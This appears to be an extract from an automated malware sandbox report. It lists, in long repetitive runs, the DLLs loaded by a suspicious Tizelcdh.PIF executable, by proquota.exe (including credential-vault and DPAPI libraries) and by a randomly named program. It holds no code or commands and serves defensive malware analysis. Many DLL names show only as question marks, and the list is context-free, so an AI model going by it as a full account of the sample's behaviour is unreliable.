                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: rasadhlp.dllJump to behavior
